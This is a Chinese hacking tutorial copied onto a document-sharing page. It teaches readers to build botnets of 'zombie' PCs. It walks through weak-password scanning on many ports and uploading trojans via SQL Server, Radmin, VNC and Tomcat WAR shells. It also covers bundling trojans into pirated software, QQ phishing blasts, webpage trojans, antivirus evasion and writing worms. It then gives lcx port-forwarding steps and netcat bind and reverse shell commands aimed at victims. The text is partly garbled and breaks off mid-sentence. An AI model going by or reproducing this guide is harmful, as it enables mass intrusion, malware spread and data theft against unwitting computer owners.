经典抓肉鸡入门.docx
《经典抓肉鸡入门.docx》由会员分享,可在线阅读,更多相关《经典抓肉鸡入门.docx(38页珍藏版)》请在冰豆网上搜索。
经典抓肉鸡入门
经典抓肉鸡入门
1.一般XP都很难扫不出IP,先要突破一下,可以用工具是“使xp支持syn扫描”,运行就重启。
线程就可以达到10240,然后将每次扫描,关闭防火墙命令是"netstopsharedaccess",一般都可以扫出IP,如果还不行,换个IP段。
2.扫描环境
一般都是XP系统,但其实扫描IP速度很慢,而且扫不多!
我建议抓鸡最好用服务器,服务器指2003系统,因为2003系统扫描速度快,而且扫到很多IP,是很好的抓鸡系统!
3.抓鸡方法:
135端口,先扫描135IP,然后整理!
然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的!
因为这个漏洞很久,所以端口也很少的了!
如果整理IP不好,就很难扫出弱口令。
1433端口,先扫描1433IP,然后整理!
然后用X-Scan-v3.3,扫描模块只选择SQL-Server弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了!
3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP添加进入,见到XP,用户new密码为空进入,然后下载木马!
见到2000,用户administrator密码为空进入然后下载木马!
4899端口,先扫描4899IP,然后整理!
然后用4899探测器,A导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行!
5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉!
80端口,先扫描80IP,然后整理,再用ApacheTomcat导入IP,端口8080改为80,等IP全部导完,点开始就可以,你看看有无一些网站结尾是HTML或者很长的,就可以进入这个网,然后上传个“hcskk.war”然后点hcskk.war进入,就可以自己下载木马,再用DOS运行。
hcskk.war我会打包的了!
啊D简单抓鸡,就不用扫描IP了,直接点肉鸡查找,然后点开始,就会自动扫描IP+弱口令,然后你上传个木马,他会1分钟自动运行的了!
如果你不太会,可以用啊D帮你!
捆绑抓鸡也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.
利用PP共享自己捆了木马的软件或电影.方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePlaye木马制作.在黑吧可以找到.当你一打开我们的电影时就会打开我们制作过的网页木马.这样看电影也会中我们的马.
利用QQ邮箱传播木马.
这里主要点HTML格式----在里面写上以下这段代码:
当人家一打开你发过去的邮件时,就会中我们的木马
QQ群发网页木马。
首先,你要申请多个QQ号,然后找款QQ消息群发器(黑吧网站可以找到大量相关QQ群发信息软件,)再然后要加上非常具有诱惑性的消息(肉鸡的多与少与这个直接相关,),骗取人家点你的网址。
最后,在晚上时可以挂在电脑上群发带有网页木马的信息。
相信只要你的信息够诱惑,肉鸡也是成群的。
攻破下载点,捆上木马放入下载点.
当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到
这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点
等待人家上钩吧!
该方法抓鸡的速度也非常快。
网站主页挂马这个应该不用具体介绍吧,入侵到一个网站得到WEBSHELL后,接下来大家是不是都忙着找首页挂马了。
大马也要免杀哦!
QQ空间主页挂马,因为每次进入QQ空间可以通过播放音乐,我们就在播放音乐那里添加自己的网马地址,就可以完成挂马拉!
!
音乐文件弹网马,就是在播放音乐时,弹出一个网马,就可以抓鸡了!
去白度贴吧说一些诱惑性的话,吸引别人下载你的木马,就可以抓鸡!
利用传播性高的病毒抓鸡,就是高手才可以的了,先做一个像熊猫烧香一样厉害的毒,因为传播强,但不要搞到死机,不然后就抓不到鸡了,然后我等于抓1只就可以传播到2只,2只传播到4只,这样抓鸡拉!
也可以找一个批量抓鸡工具,但不要有后门的,不然帮人抓鸡了!
!
4.免杀木马
抓鸡一定要个免杀木马,不然就抓不到的,先要学会免杀,那就容易抓到鸡拉!
不会可以先学定位,用CCM修改就OK了
三个入侵的必备小工具-lcx.exe、nc.exe、sc.exe作用几使用方法
2008年02月18日评论
(1)|浏览(10)点击查看原文
一、lcx.exe的使用方法
以前抓肉鸡都是通过1433弱口令,然后..
但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
用法:
如在本机B上监听-listen513389,在肉鸡A上运行-slave本机ip51肉鸡ip3389那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。
例:
现在有一个ip为201.1.1.1的1433弱.用端口扫描只发现开放了1433端口.用sqltools链接,dir看一下C:
\>DIRC:
\
2004/09/1710:
32
autoAK2005/02/2117:
0812,541avgun.log。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
。
日语,显示不正常.呵呵.
netstat-an查看开放端口TCP0.0.0.0:
33760.0.0.0:
0LISTENING
TCP0.0.0.0:
33890.0.0.0:
0LISTENING
TCP0.0.0.0:
37910.0.0.0:
0LISTENING
TCP0.0.0.0:
38770.0.0.0:
0LISTENING
终端已开.看下IP
ipconfig
C:
\>ipconfig
Windows2000IPConfigurationEthernetadapter
Connection-specificDNSSuffix.:
IPAddress............:
192.168.1.24
SubnetMask...........:
255.255.255.0
DefaultGateway.........:
192.168.1.1192这样的是内网了...
现在可以用lcx.exe搞定了...
上传lcx.exe到肉鸡...C:
\>dirlcx.exeC:
\WINNT\system32
2006/04/0213:
4032,768lcx.exe首先在自己机子的cmd下运行
lcx.exe-listen513389
意思是监听51端口并转发到3389端口
显示如下[+]Listeningport51......
[+]ListenOK!
[+]Listeningport3389......
[+]ListenOK!
[+]WaitingforClientonport:
51......然后在肉鸡上运行lcx.exe-slave你的IP51201.1.1.13389
201.1.1.1是我举例用的肉鸡IP.换成你的..运行以后本机监听端口就会收到信息.[+]Listeningport51......
[+]ListenOK!
[+]Listeningport3389......
[+]ListenOK!
[+]WaitingforClientonport:
51......
[+]AcceptaClientonport55from201.1.1.1......
[+]WaitinganotherClientonport:
3389....好了.现在在自己机子上链接127.0.0.1或者输你自己IP.
发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!
优点,搞定内网肉鸡.
缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.当然也可以用反弹木马控制肉鸡了...
二、nc.exe的使用方法
1.Netcat1.10forNT-nc11nt.zip,原始英文信息
2.Netcat1.10forNT帮助信息
3.Netcat1.10常用的命令格式
4.管理肉鸡,更改肉鸡设置
5.下载连接
######################################################################
1.Netcat1.10forNT-nc11nt.zip
######################################################################
BasicFeatures
*Outboundorinboundconnections,TCPorUDP,toorfromanyports
*FullDNSforward/reversechecking,withappropriatewarnings
*Abilitytouseanylocalsourceport
*Abilitytouseanylocally-configurednetworksourceaddress
*Built-inport-scanningcapabilities,withrandomizer
*Canreadcommandlineargumentsfromstandardinputb
*Slow-sendmode,onelineeveryNseconds
*Hexdumpoftransmittedandreceiveddata
*Abilitytoletanotherprogramserviceestablished
connections
*Telnet-optionsresponder
NewforNT
*Abilitytoruninthebackgroundwithoutaconsolewindow
*Abilitytorestartasasingle-threadedservertohandleanew
connection
________________________________________________________________________
Someofthefeaturesofnetcatare:
Outboundorinboundconnections,TCPorUDP,toorfromanyports
FullDNSforward/reversechecking,withappropriatewarnings
Abilitytouseanylocalsourceport
Abilitytouseanylocally-configurednetworksourceaddress
Built-inport-scanningcapabilities,withrandomizer
Built-inloosesource-routingcapability
Canreadcommandlineargumentsfromstandardinput
Slow-sendmode,onelineeveryNseconds
Optionalabilitytoletanotherprogramserviceinboundconnections
Someofthepotentialusesofnetcat:
Scriptbackends
Scanningportsandinventoryingservices
Backuphandlers
Filetransfers
Servertestingandsimulation
Firewalltesting
Proxygatewaying
Networkperformancetesting
Addressspoofingtests
ProtectingXservers
1001otherusesyou`lllikelycomeupwith
Netcat+Encryption=Cryptcat
对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
1.1NC.EXE是一个非标准的telnet客户端程序,
1.2还有一个putty.exe客户端程序,提供四种连接模式
-raw-telnet-rlogin-ssh.
######################################################################
2.Netcat1.10forNT帮助信息
######################################################################
C:
\WINDOWS\Desktop>nc-h
[v1.10NT]
connecttosomewhere:
nc[-options]hostnameport[s][ports]...
listenforinbound:
nc-l-pport[options][hostname][port]
options:
-ddetachfromconsole,backgroundmode(后台模式)
-eproginboundprogramtoexec[dangerous!
!
]
-ggatewaysource-routinghoppoint[s],upto8
-Gnumsource-routingpointer:
4,8,12,...
-hthiscruft(本帮助信息)
-isecsdelayintervalforlinessent,portsscanned(延迟时间)
-llistenmode,forinboundconnects(监听模式,等待连接)
-Llistenharder,re-listenonsocketclose(连接关闭后,仍然继续监听)
-nnumeric-onlyIPaddresses,noDNS(ip数字模式,非dns解析)
-ofilehexdumpoftraffic(十六进制模式输出文件,三段)
-pportlocalportnumber(本地端口)
-rrandomizelocalandremoteports(随机本地远程端口)
-saddrlocalsourceaddress(本地源地址)
-tanswerTELNETnegotiation
-uUDPmode
-vverbose[usetwicetobemoreverbose](-vv更多信息)
-wsecstimeoutforconnectsandfinalnetreads
-zzero-I/Omode[usedforscanning](扫描模式,-vv)
portnumberscanbeindividualorranges:
m-n[inclusive]
######################################################################
3.Netcat1.10常用的命令格式
######################################################################
下面引用《沉睡不醒10月15日凌晨》的文章的部分。
3.1.端口的刺探:
nc-vvipport
RIVER[192.168.0.198]19190(?
)open//显示是否开放open
3.2.扫描器
nc-vv-w5ipport-portport
nc-vv-zipport-portport
这样扫描会留下大量的痕迹,系统管理员会额外小心
3.3.后门
victimmachine:
//受害者的机器
nc-l-pport-ecmd.exe//win2000
nc-l-pport-e/bin/sh//unix,linux
attackermachine:
//攻击者的机器.
ncip-pport//连接victim_IP,然后得到一个shell。
3.4.反向连接
attackermachine:
//一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc-vv-l-pport
victimmachine:
nc-ecmd.exeattackerip-pport
nc-e/bin/shattackerip-pport
或者:
attackermachine:
nc-vv-l-pport1/*用于输入*/
nc-vv-l-pprot2/*用于显示*/
victimmachine:
ncattacker_ipport1|cmd.exe|ncattacker_ipport2
ncattacker_ipport1|/bin/sh|ncattacker_ipport2
139要加参数-s(nc.exe-L-p139-d-ecmd.exe-s对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。
3.5.传送文件:
3.5.1attackermachine<--victimmachine//从肉鸡拖密码文件回来.
nc-d-l-pportpath\file.txt/*victimmachine*/需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入
Crl+C.
3.5.2attackermachine-->victimmachine//上传命令文件到肉鸡
nc-vv-l-pport>path\file.txt /*victimmachine*/需要Ctrl+C退
出
nc-dvictim_ipport//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
结论:
可以传输ascii,bin文件.可以传输程序文件.
问题:
连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe.
或者只有再次连接使用pskill.exe杀掉进程.但是是否释放传输文件打开的句柄了?
3.6端口数据抓包.
nc-vv-w2-otest.txt8021-15
<000000583530302053796e746178206572726f72#500Syntaxerro
r
<000000682c20636f6d6d616e6420222220756e72#,command""un
r
<0000007865636f676e697a65642e0d0a#ecognized...
<00000084830000018f#.....
3.7telnet,自动批处理。
★★★★★我要重点推荐的东西就是这个.
ncvictim_ipportnc-vvvictim_ipportnc-dvictim_ipporta.cmd
@echos>>a.cmd
@echocd/d%%windir%%\system32\>>a.cmd
@netstop"sksockserver">>a.cmd
@snake.exe-configport11111>>a.cmd
@netstart"sksockserver">>a.cmd
@exit>>a.cmd
:
auto
@for/f"eol=;tokens=1,2"%%iin(%1)do@(nc.exe-vv-w3%%i1234>80.txt
gotostart
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多
是三条一组--妮姆达病毒扫描你的。
这样就会得到肉鸡的.虽然质量不高.
但是也是一种便宜的办法.
肉鸡特征:
1。
unicode漏洞
2。
guest密码为空,administrators组用户
3。
其他漏洞
自己慢慢的爽去吧。
不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后
将tftp.exe改名。
然后用pskill干掉mmc.exe进程,之后是杀毒。
做好后门以后,将gue
st帐号停用,以对付